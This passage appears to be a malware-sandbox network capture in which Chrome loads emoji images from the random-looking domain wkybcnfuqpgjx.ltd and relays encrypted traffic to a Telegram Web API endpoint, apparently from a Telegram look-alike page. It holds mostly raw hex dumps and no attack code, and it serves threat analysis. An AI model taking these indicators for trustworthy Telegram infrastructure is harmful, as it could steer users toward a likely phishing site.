                                  server-timing: cfL4;desc="?proto=TCP&rtt=1784&min_rtt=1768&rtt_var=696&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1186&delivery_rate=1535226&cwnd=239&unsent_bytes=0&cid=2f4f1176e4a12c0e&ts=371&x=0"
                                  2025-01-12 00:04:05 UTC463INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 03 00 50 4c 54 45 47 70 4c 8e 53 3e c6 a7 75 73 2a 22 b6 88 61 c5 a7 76 77 30 24 c8 aa 79 c9 ab 7a 75 2d 25 c2 a4 73 71 29 21 9f 41 37 c8 aa 79 7f 3b 29 77 2e 26 8f 65 1b 7f 59 18 a8 7d 45 c4 a6 75 80 5a 18 75 2d 25 ca ad 7b 76 2e 25 c1 a1 70 74 2d 23 cb ae 7c c2 a4 73 77 2f 26 c7 a8 76 78 30 27 cd b0 7d 6f 26 1e be a0 6f a6 81 43 ff ff ff fe fe fe f8 ff ff fb fc fc f0 ff ff f8 f9 f9 ec f8 fc f3 f4 f4 e1 f5 f8 ee ee ee e0 ed f4 e6 e7 e7 d9 e6 ec de df df d0 e0 e5 d6 d7 d7 ca d8 dd cf d0 d1 c4 d0 d4 ca cb cc ff c9 46 ff c1 4d c7 c6 c6 bd c7 d9 bb c9 cb ff bd 3f fd bb 4e c0 c1 c2 fa b9 4c fd b7 3e f8 b7 4b f1 b8 58 cc bc a1 b2 c0 cf f4 b6 4e f7 b5 49 ec
                                  Data Ascii: PNGIHDRPLTEGpLS>us*"avw0$yzu-%sq)!A7y;)w.&eY}EuZu-%{v.%pt-#|sw/&vx0'}o&oCFM?NL>KXNI
                                  2025-01-12 00:04:05 UTC1369INData Raw: 68 90 92 94 fb 67 56 f5 69 57 c4 89 25 f1 67 57 fd 62 50 9d 87 85 f2 65 54 ef 66 56 b2 88 45 c1 86 25 95 8b 79 8b 8c 8e ed 65 55 a6 80 7b ed 63 53 f4 60 4e e9 63 54 9e 86 5d f9 5a 48 ea 5f 4f b9 80 22 cd 6f 3a 7e 87 8d e3 5f 50 a6 77 71 ef 59 4c b4 7e 23 e4 5b 4b 90 7c 78 7f 82 83 e1 58 48 a1 7b 3b b0 6b 64 ec 53 41 cb 5f 55 d8 5a 4c 91 7a 55 de 55 45 b3 72 15 a7 75 20 dc 52 42 7d 78 73 b2 62 59 cd 57 45 e8 4b 39 da 50 3f d3 50 42 d5 4f 3f d8 4d 3d 95 67 62 6f 75 79 cd 4f 41 d4 4c 3d c2 53 46 99 6d 22 b1 58 4e d1 4b 3b d4 48 38 ca 4c 3d ea 3e 2d 86 6d 41 cf 48 38 c2 4d 3f 75 6c 65 9a 5b 53 ce 46 36 d8 41 30 95 67 1c b6 4f 40 bb 4b 3e ca 45 35 ce 43 34 c4 46 38 cb 42 33 8f 63 1b c8 41 32 c9 40 30 ba 45 38 b2 48 3c c6 3f 30 9e 4e 42 d0 39 28 89 55 4f c3 3d
                                  Data Ascii: hgViW%gWbPeTfVE%yeU{cS`NcT]ZH_O"o:~_PwqYL~#[K|xXH{;kdSA_UZLzUUEru RB}xsbYWEK9P?PBO?M=gbouyOAL=SFm"XNK;H8L=>-mAH8M?ule[SF6A0gO@K>E5C4F8B3cA2@0E8H<?0NB9(UO=
                                  2025-01-12 00:04:05 UTC1369INData Raw: 71 63 3b d9 a8 fd dd 9d 39 23 22 d3 47 f5 b0 49 45 c8 7c 7d e5 8a d1 5c 26 42 0c 26 03 21 6e 61 76 5c 62 48 e2 a6 9f 7c 92 78 f4 d4 d6 7b b7 ea 74 3a 5d 15 f6 51 c0 83 4f 05 ee 88 5c 07 23 73 e9 aa a5 90 b7 f7 0a 6f ef 85 de f8 15 13 70 33 be 82 2f aa 49 64 63 f1 63 1c 04 23 04 e7 ea 6a e4 8d 19 f5 c9 27 a3 76 97 2a f8 4d 81 51 4d 72 90 d1 e0 c1 60 32 99 96 6c 4b 24 57 58 d9 a9 a2 7c a3 54 85 7c 9b f6 df da 92 a3 0b 1a af b4 b5 61 60 55 af 80 21 6b 03 02 60 b2 03 10 1b 71 df 50 cd 80 2f 83 0e 82 23 39 6e e2 b8 71 24 d1 cd 6d 8c db 18 00 82 0d 82 d3 eb ec e5 11 b9 23 92 c7 2b 8d 4b 23 10 b2 a4 d1 18 0c d2 27 50 28 79 4c 06 9b c9 b6 66 5b 23 45 79 5a 81 9f a7 8f 52 5d d8 f4 f0 d1 b9 0b bd 06 ae c3 73 fd bb d5 2b 57 2e 23 89 8b 8c c4 2f f5 4d fd 72 2a 34 69
                                  Data Ascii: qc;9#"GIE|}\&B&!nav\bH|x{t:]QO\#sop3/Idcc#j'v*MQMr`2lK$WX|T|a`U!k`qP/#9nq$m#+K#'P(yLf[#EyZR]s+W.#/Mr*4i
                                  2025-01-12 00:04:05 UTC1369INData Raw: 17 d8 71 0a 62 a0 c1 f7 74 a0 d0 ad 74 ae b7 15 52 49 4d 40 9a 02 56 d3 c2 36 ac e6 5c 71 ae 4e 77 b9 28 4c 22 63 ca 0b 2d 79 0a 49 f9 ef 32 fb 3b ba e7 07 2e e9 3b 50 2c 1e 37 6a ba 94 1b e8 eb c9 35 09 b9 72 1a 02 a2 c4 2f 3a 3d 39 5a 61 6b 81 2c 18 3c ad 56 a9 e5 34 35 11 f4 b0 5b ba 3f 06 34 9c e1 67 02 c5 54 42 a7 79 3e ab e6 cc b6 4e e2 9b 84 84 00 59 32 e0 df 74 16 9d 8e 18 6c 36 9b c3 44 d2 6c 01 47 c4 61 b2 52 9f 07 f8 c4 53 f0 69 40 d3 8c 11 1b 84 99 11 0e 42 ef 40 85 82 67 dc 63 a6 9c 09 42 06 7e 73 c2 64 b2 d9 0c ba 15 9b 03 ef 9c b8 1c 36 2b fb de f3 6c b1 69 01 41 d8 03 d0 70 86 bb 02 23 bc 85 62 87 44 1e d2 72 4c e7 44 84 81 a0 c3 3e 64 13 16 c6 b2 60 c3 9c b1 62 a9 7e 3b 71 ee 0f 01 c1 67 04 9a 7c e3 a1 6e 81 42 a1 78 14 7c 83 1f c6 fb 0a
                                  Data Ascii: qbttRIM@V6\qNw(L"c-yI2;.;P,7j5r/:=9Zak,<V45[?4gTBy>NY2tl6DlGaRSi@B@gcB~sd6+liAp#bDrLD>d`b~;qg|nBx|
                                  2025-01-12 00:04:05 UTC1369INData Raw: 37 1b 88 f0 d0 5b 41 19 ab a9 94 22 24 95 82 0f 62 d8 37 be 6c e0 78 e7 59 81 5a 2e 22 97 d0 be 46 03 c0 d0 23 c9 02 1b fb e4 bd 20 ec d2 96 2d 31 b1 45 b6 c8 b2 9c 40 4c 12 68 57 db 15 78 09 80 2f ec 6d 27 8c e9 08 7b 01 c3 92 04 5a 24 e7 86 6f 0d cd 0b a3 e3 0b 97 0a 4d f7 c0 f0 23 eb 2d 90 52 44 02 39 48 72 b3 23 b0 fa c5 03 5d 9d 42 a2 d4 30 64 70 96 08 ae 97 b7 c4 e7 b0 f0 27 d2 b4 f5 19 dd 03 63 e2 2b 58 48 a1 22 81 4c 7a 6a 4b de 11 23 d0 f0 ab b0 17 07 1c 3f 71 72 90 cc 4e c5 d0 87 04 47 35 e1 b9 eb 69 18 68 d1 1d 70 cb 56 b8 54 88 3d 9c 6a c7 c9 e6 e2 43 4c 57 c3 19 31 01 2f f4 19 18 f0 8c 0f 8f c6 8f 3f af b5 92 f2 11 13 21 84 81 7c 00 e6 fb 21 00 e2 8b fb 4e 34 32 00 42 e1 ba 5a 5b c7 26 82 c5 b2 4f 6d cb cd a3 80 4f fe 42 fb 05 7d fc 36 d9 f5
                                  Data Ascii: 7[A"$b7lxYZ."F# -1E@LhWx/m'{Z$oM#-RD9Hr#]B0dp'c+XH"LzjK#?qrNG5ihpVT=jCLW1/?!|!N42BZ[&OmOB}6
                                  2025-01-12 00:04:05 UTC659INData Raw: ad 11 64 06 da cf 0f 1e 3c f8 05 fa 95 ea f1 af 8f 1f 3f 26 7f 7a f4 eb a3 47 f7 c1 78 ed 5a 73 f3 d5 d6 1b 3d 00 cf 93 40 4a b8 7a f5 62 af 90 da 42 cf b0 8a 8a 8a 36 5d d6 a1 43 87 48 20 ce 24 8c af 4d 63 30 00 c8 71 0c 3b 15 63 b0 1d 80 4c 34 2c bb 01 32 88 c2 41 ff 67 ec 71 87 30 f3 fe 6d d8 fb 1b 50 0f c0 63 3b 12 37 81 10 ef f1 b2 05 91 77 1f b6 17 5c bb 55 57 a7 cb 3f 74 c4 00 04 e2 1e 13 30 f6 52 aa 05 be 0d 81 89 d6 9f da de 79 d9 60 d5 4c 34 c0 41 1f 7c 30 e2 9d 21 6f 0d 1e f8 3a f4 1a ee d5 d7 5e 1f 38 70 f0 5b 43 86 bc 33 02 a8 a4 f1 97 07 f7 ef ff 7c fb 76 b7 c0 bf 9f 27 f7 78 d3 a6 90 90 b5 2b 97 85 6c ab 7a 74 fd 22 e0 8e 1f 3f 02 1d d2 0b b3 0c 2b b8 67 e7 4e 78 e4 47 5b e1 bb a2 2d 89 ab 7b f5 36 d3 73 0d 68 54 23 46 0c 1b f2 d6 5f 07 be
                                  Data Ascii: d<?&zGxZs=@JzbB6]CH $Mc0q;cL4,2Agq0mPc;7w\UW?t0Ry`L4A|0!o:^8p[C3|v'x+lzt"?+gNxG[-{6shT#F_


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  144192.168.2.650116149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:05 UTC449OUTPOST /apiw1 HTTP/1.1
                                  Host: zws2.web.telegram.org
                                  Connection: keep-alive
                                  Content-Length: 88
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Origin: https://wkybcnfuqpgjx.ltd
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:05 UTC88OUTData Raw: 2a 10 06 78 25 cb 00 4d d1 64 fc 7d c2 80 48 37 9a 7d c1 58 09 1f f8 fa d4 5d 7e 46 81 75 9f 62 b0 a2 34 a5 e3 46 0b 98 97 9e 46 8b bc 14 89 4e f3 8d d7 84 eb 56 75 84 84 b4 04 2a 97 a6 72 32 33 38 e0 85 e2 3c 97 d3 7f 51 4e 7d 2a 54 f2 06 5e f5 ad 9f 0a da b3 da
                                  Data Ascii: *x%Md}H7}X]~Fub4FFNVu*r238<QN}*T^
                                  2025-01-12 00:04:05 UTC407INHTTP/1.1 200 OK
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:04:05 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 88
                                  Connection: close
                                  Pragma: no-cache
                                  Cache-control: no-store
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: POST, OPTIONS
                                  Access-Control-Allow-Headers: origin, content-type
                                  Access-Control-Max-Age: 1728000
                                  Strict-Transport-Security: max-age=35768000
                                  2025-01-12 00:04:05 UTC88INData Raw: 2a 10 06 78 25 cb 00 4d 82 f9 0e 38 d1 bd 37 f4 3d 75 ac 63 09 cb f4 88 fe ba 2c 13 ef 15 76 c1 ee 0f 01 3b d5 b5 40 bd b8 c2 b9 bd fe 84 68 54 f2 6a fb bd aa 76 4b af 6c 7e 6b 05 cd 4a 49 d7 29 8d 43 29 7f 91 2a c8 10 be 26 b1 a9 e3 18 32 ed 44 6a b9 fc 30 8f 67
                                  Data Ascii: *x%M87=uc,v;@hTjvKl~kJI)C)*&2Dj0g


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  145192.168.2.650115149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:05 UTC350OUTGET /apiw1 HTTP/1.1
                                  Host: zws2.web.telegram.org
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:05 UTC355INHTTP/1.1 404 Not Found
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:04:05 GMT
                                  Content-Type: text/html
                                  Content-Length: 169
                                  Connection: close
                                  Pragma: no-cache
                                  Cache-control: no-store
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: POST, OPTIONS
                                  Access-Control-Allow-Headers: origin, content-type
                                  Access-Control-Max-Age: 1728000
                                  2025-01-12 00:04:05 UTC169INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 30 2e 33 2e 33 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/0.3.33</center></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  146192.168.2.650123172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:05 UTC370OUTGET /img-apple-160/1f1e7-1f1fe.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:05 UTC903INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:04:05 GMT
                                  Content-Type: image/png
                                  Content-Length: 4699
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:42 GMT
                                  ETag: "674840b2-125b"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 1
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l1E7rrJBkdV09o%2BwmPlRmzTfnCnlwNiligdOCK%2FZSjLk5dRC9PNjOkAmMpIf76wpgJeJYi4%2FGhI29VbdTE9Sq6Fqz4Bm2nVBvKrrZPX4eg7%2F3g0iHYgJB%2FaNTO4YubR49C%2FE9A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e31ea821c459-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1513&min_rtt=1511&rtt_var=571&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=948&delivery_rate=1908496&cwnd=233&unsent_bytes=0&cid=b36b82ff0d80a97b&ts=149&x=0"
                                  2025-01-12 00:04:05 UTC466INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 03 00 50 4c 54 45 47 70 4c 3e 57 27 8c 64 55 b5 bb bb ad 64 64 0b 4f 0b 0d 50 0d 7c 8d 8d ad 5c 5c bb 76 76 ab 66 66 0c 50 0c b1 64 64 0c 50 0c a3 40 40 16 6b 16 8c 17 17 b1 69 6a 0e 52 0e ba af af 0d 51 0d 99 63 63 98 ac ac 8f 8d 8d 7d 36 36 72 04 04 a6 ac ac b1 62 62 0a 4d 0a b3 70 70 0f 53 0f b3 65 65 0c 4f 0c be c4 c4 66 33 33 0f 51 0f b9 6a 6a 08 4c 08 b0 61 61 11 56 11 0a 4d 0a b6 b1 b1 ba 6b 6b ad 5e 5e 09 4d 09 77 83 83 77 75 75 e1 ff ff df fa fb dd f6 f7 de ef f0 db e8 e8 d5 e2 e2 d9 dc dd d1 d0 d0 d1 c3 c3 b6 c9 c9 cf b6 b6 b3 b8 b9 ca ab ab c8 a0 a0 a7 a9 a9 c6 97 97 c3 8f 8f af 95 95 9b 98 99 c3 86 86 c7 7c 7e ac 84 84 b9 7e 7e 92 89 89 c2
                                  Data Ascii: PNGIHDRPLTEGpL>W'dUddOP|\\vvffPddP@@kijRQcc}66rbbMppSeeOf33QjjLaaVMkk^^Mwwuu|~~~
                                  2025-01-12 00:04:05 UTC1369INData Raw: 1d d4 26 26 d3 26 26 d2 26 26 d3 25 25 da 21 25 0e 8d 0f d1 25 25 b7 30 30 00 95 07 c2 2b 2b d2 24 24 ac 34 34 8c 42 3d ce 25 25 d1 23 23 d0 23 23 e2 19 25 15 84 15 b7 2d 2c 0b 8b 0b cf 22 22 44 6c 11 1d 7e 1a c5 25 26 eb 12 24 cd 21 21 ce 20 20 0a 88 0a c9 21 21 cc 1f 1f 08 87 08 b6 28 27 9b 33 2f cb 1d 1d c8 1e 1e 30 6f 0b 06 85 06 ca 1c 1c 10 7d 10 ad 28 27 17 77 17 c8 1b 1b 04 82 04 c5 1b 1b c7 19 19 bb 1e 1e 43 5e 0b 02 80 02 dc 0c 1b c5 18 18 75 3a 3a c3 17 17 07 7a 06 00 7e 00 af 1f 1e c3 15 15 15 6d 15 0e 71 0f 9f 23 23 c1 14 14 05 76 05 be 14 14 c1 12 12 be 12 12 15 67 15 b3 16 16 b0 17 17 b7 14 14 be 10 10 b9 11 11 5a 43 08 cd 06 11 bc 0f 0f aa 16 16 bb 0e 0e 04 6d 04 13 62 13 ba 0d 0d b7 0e 0e 90 1f 18 79 28 1f b9 0b 0b 09 65 09 b7 0b 0b b0 0d
                                  Data Ascii: &&&&&&%%!%%%00++$$44B=%%####%-,""Dl~%&$!! !!('3/0o}('wC^u::z~mq##vgZCmby(e
                                  2025-01-12 00:04:05 UTC1369INData Raw: d0 22 8d 14 12 1b d9 36 31 5d 42 5f 3f 15 19 ef 13 e8 2d 30 62 57 77 82 54 fa 5d e7 11 f5 87 d6 89 c3 06 87 16 9b 6a dc a3 2a 71 f9 8c 4a ac 07 82 11 05 70 3b 27 f8 d2 a5 7d 17 95 a9 d2 87 9f 4d fb 5f c5 52 24 43 79 4a e0 c7 dd 3c 01 9b 8e 3b 3c bd 40 99 7c 49 14 c8 be ef be 7e f6 47 eb d5 aa 6b 48 46 27 07 b4 1e 1e 6a bc ed ce 8b 80 2a 27 5f ee 04 e7 9a 6f 5c 5c 39 5a 30 4b 8d c1 09 46 5b 42 24 8b 3e a6 35 46 36 e9 25 0c 46 de c1 a7 f9 80 b9 25 cd 53 a6 1b a2 10 84 cf fa 0c 26 71 19 da 88 56 8b 49 f2 24 c8 58 d0 f8 25 11 87 4a 3f ed f9 3c ff 5c e3 e4 b3 7a f3 aa c6 46 da ad 07 28 25 03 09 bc 9b 4d 20 03 04 92 98 26 05 2a d0 39 52 be 78 c2 28 95 8b 73 4d d5 81 28 a1 31 5c e0 31 41 41 10 8c 7b 62 d2 3b b8 d0 48 fd fe de e9 6f 0b 37 38 9f 7f 5c 02 81 3f b0
                                  Data Ascii: "61]B_?-0bWwT]j*qJp;'}M_R$CyJ<;<@|I~GkHF'j*'_o\\9Z0KF[B$>5F6%F%S&qVI$X%J?<\zF(%M &*9Rx(sM(1\1AA{b;Ho78\?
                                  2025-01-12 00:04:05 UTC1369INData Raw: 7b 58 4d 19 96 73 68 0c dd 02 8f b6 70 bc c6 1d 77 3a 9d 43 df db 12 cf 62 5f bf b1 87 ba 68 b6 24 4f 10 3b d0 33 dc 6e 05 d3 8f 0d 5f af 7e 80 96 5e 11 a4 5b 43 10 f5 2f 69 96 1c 95 da f1 4c 65 cf f8 8b 14 81 16 00 e0 84 7a cc 6f 37 45 a7 01 32 b1 a0 68 f0 74 cb 34 e0 e9 62 57 87 b4 03 8f 67 44 3c db d7 8a a6 29 90 02 1b 5c 10 44 39 0e 1a d8 d2 2c ed d3 73 43 6a 31 e5 4a a1 a0 1a 4e a3 25 8d 81 04 ff bf 99 4c 40 04 33 d4 16 74 97 6c e6 84 ab be d6 81 66 ee 76 95 9d 97 84 b3 84 14 33 e4 26 fa 10 10 02 0a 7d 62 b0 af 8f 93 62 b1 74 a4 97 41 e2 69 1d d5 c5 a5 3e be 8c 06 04 f0 bf 34 e2 04 73 b0 4c 5e ff 9a 29 c4 81 94 50 d2 7f 0a e7 db 12 ea e0 04 32 53 e0 28 40 6c e8 48 69 30 d0 0b b4 d9 c1 3e dd 4e 60 47 a5 43 3d bc 2d a3 0a ad b6 b2 4f 2c 53 5b 50 d5 9e
                                  Data Ascii: {XMshpw:Cb_h$O;3n_~^[C/iLezo7E2ht4bWgD<)\D9,sCj1JN%L@3tlfv3&}bbtAi>4sL^)P2S(@lHi0>N`GC=-O,S[P
                                  2025-01-12 00:04:05 UTC126INData Raw: 84 f0 d7 92 09 21 7c 2d 8f 05 a5 52 be 60 59 ee d9 7a 84 5c 9b 90 20 f2 18 77 bc 11 77 00 1b 90 42 e2 23 a4 00 8f fc 7c d7 ae 28 e9 58 0b fa 4f 92 1a fa 3e aa 3f de 30 c7 72 2c bb 58 72 4c db 65 ec 51 a8 85 a2 7b 6b 5e 55 75 3c 1c 90 de 1b 81 6b d1 a4 49 93 26 4d 9a 34 69 d2 a4 49 93 26 4d 9a 34 69 d2 a4 c9 78 e0 7f fd bc 9e 5e 14 f1 67 88 00 00 00 00 49 45 4e 44 ae 42 60 82
                                  Data Ascii: !|-R`Yz\ wwB#|(XO>?0r,XrLeQ{k^Uu<kI&M4iI&M4ix^gIENDB`


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  147192.168.2.650124172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:05 UTC608OUTGET /img-apple-160/1f1e7-1f1f4.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:06 UTC904INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:04:06 GMT
                                  Content-Type: image/png
                                  Content-Length: 4503
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:42 GMT
                                  ETag: "674840b2-1197"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: REVALIDATED
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kohOgngxWmQs9sd%2FvafsoPLWWKIdoBiVHrTtMmwYbrNBq9Nk%2FkxzZiinYbx9XPJg%2BBrhMupi2MaSR9u61GbfV2wFPn1qT%2FlW%2Fhegvg9ETMopxq4wjcrBJ1FtfBQPUwUYTug%2F9A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e31eed724373-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1565&min_rtt=1553&rtt_var=606&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1186&delivery_rate=1770770&cwnd=238&unsent_bytes=0&cid=aa3f179f1b57a4ac&ts=634&x=0"
                                  2025-01-12 00:04:06 UTC465INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 03 00 50 4c 54 45 47 70 4c 86 5d 5b 16 3f 27 b1 65 6d 0b 41 26 b7 6e 76 0c 41 26 ae 62 69 0b 40 25 a6 91 23 8d 20 2c 16 59 37 b6 6d 74 99 2e 3a 0a 41 25 8f 7a 0a 07 44 22 76 0a 16 75 04 15 b2 6a 71 90 34 3d b9 70 78 0b 40 25 af 65 6c 0b 40 25 ba 70 78 b1 69 70 0e 44 28 bb 71 79 09 3e 23 ae 64 6c 99 43 49 f7 f7 e7 fe f6 9d ff fd 37 ff f3 3c fc ed 3a fa e7 35 ee d9 9a de d9 c0 f2 df 67 f6 e3 46 fe e1 34 fc dd 35 fa dc 3f f9 db 37 f8 d9 34 f6 d8 36 fe d6 27 f4 d6 3f ed de 26 fe b7 bd f4 d6 33 e6 d1 6b f1 d3 2f eb ce 47 ef d1 2d f6 cb 22 ec ce 2b e1 d6 1b cb d4 57 ea cc 28 f7 c0 3f d6 d0 41 e8 ca 26 f0 c5 1b e6 c8 24 dc cf 18 e4 c6 22 d6 c0 64 f4 b8 3e e2
                                  Data Ascii: PNGIHDRPLTEGpL][?'emA&nvA&bi@%# ,Y7mt.:A%zD"vujq4=px@%el@%pxipD(qy>#dlCI7<:5gF45?746'?&3k/G-"+W(?A&$"d>
                                  2025-01-12 00:04:06 UTC1369INData Raw: 41 5b c3 57 24 c7 48 56 cd 45 52 24 95 6e a8 55 5d b9 4c 59 44 8b 3d 6b 71 57 8f 5f 55 ce 3f 4d ad 4d 57 d0 39 49 26 8c 59 c6 43 2c 2c 7d 92 43 7d 54 25 8b 58 b9 41 4e d5 34 45 25 8a 57 72 67 41 d3 34 44 aa 46 50 23 89 56 d2 33 44 23 88 55 cf 33 43 c1 38 46 21 86 54 d0 30 42 3a 7f 30 cc 31 41 20 84 52 49 72 40 cd 2e 3e ac 3d 47 1e 83 50 5f 62 4b 11 85 60 c1 34 33 cc 2b 3d 1b 81 4e 1e 7e 4e c9 2a 3b b2 33 41 18 7e 4b 20 79 4c be 2b 3a c6 27 38 16 7b 49 53 59 4b c3 24 35 06 7d 59 14 79 46 cc 1c 42 1c 73 48 b1 2a 36 12 77 44 c0 21 32 95 34 38 0e 75 43 16 70 42 b5 22 30 bd 1e 2f 0f 73 41 1d 6b 44 b7 1e 2e 0c 71 3e 15 6c 40 bb 1b 2c ab 22 31 0a 6e 3b b7 19 2a 47 4b 49 17 64 3d 10 67 3c b4 17 28 ad 1a 2a 9b 22 2f bf 0e 35 06 6b 3a b3 15 25 05 69 37 16 5f 3a b0
                                  Data Ascii: A[W$HVER$nU]LYD=kqW_U?MMW9I&YC,,}C}T%XAN4E%WrgA4DFP#V3D#U3C8F!T0B:01A RIr@.>=GP_bK`43+=N~N*;3A~K yL+:'8{ISYK$5}YyFBsH*6wD!248uCpB"0/sAkD.q>l@,"1n;*GKId=g<(*"/5k:%i7_:
                                  2025-01-12 00:04:06 UTC1369INData Raw: 13 0a 86 d2 52 28 c8 43 81 82 dc 7b a5 92 ff 3b 37 15 0d 18 c2 0f ef 90 e9 5f cc 3f e0 dd c0 80 0b 9e f0 8c 8b 1f 07 00 53 b2 43 27 98 01 02 c7 1b 0c 86 c0 ec 66 f9 f6 5d ba 5c a6 93 5b 7b eb 23 7a 40 17 af db d5 dd 6e 34 b8 f8 f9 e2 bb e1 90 0f b7 0d 03 85 66 dc e7 db de bd 7d 9b 77 dd cc 9d 5d ae 09 9e a0 c3 61 48 88 ca f1 5f 3b e7 16 1b c7 55 06 e0 6f ce 9c 99 d9 d9 f5 ae 37 36 b1 63 a7 49 5a db 09 4d 9c a4 94 52 35 a4 2d a2 ad 5a 50 a1 15 08 89 08 21 f1 c6 3b 4f 88 77 24 9e a8 90 78 aa 00 21 41 2f 42 85 f2 00 45 8d 4a 4b 5b 9a 40 4b 93 b6 69 93 56 69 13 3b 37 3b b1 1d 6f bc bb 9e bd cc cc 39 83 33 f2 6a b0 d7 66 63 67 2b f7 61 bf 99 39 1a cd ce ee f9 e6 ff cf 7f 66 a4 d5 6e bc a7 d0 95 f9 1a 27 8f 76 2d 68 8e 7c f1 36 0a eb 99 66 5a 55 6d 42 1d 1c c8
                                  Data Ascii: R(C{;7_?SC'f]\[{#z@n4f}w]aH_;Uo76cIZMR5-ZP!;Ow$x!A/BEJK[@KiVi;7;o93jfcg+a9fn'v-h|6fZUmB
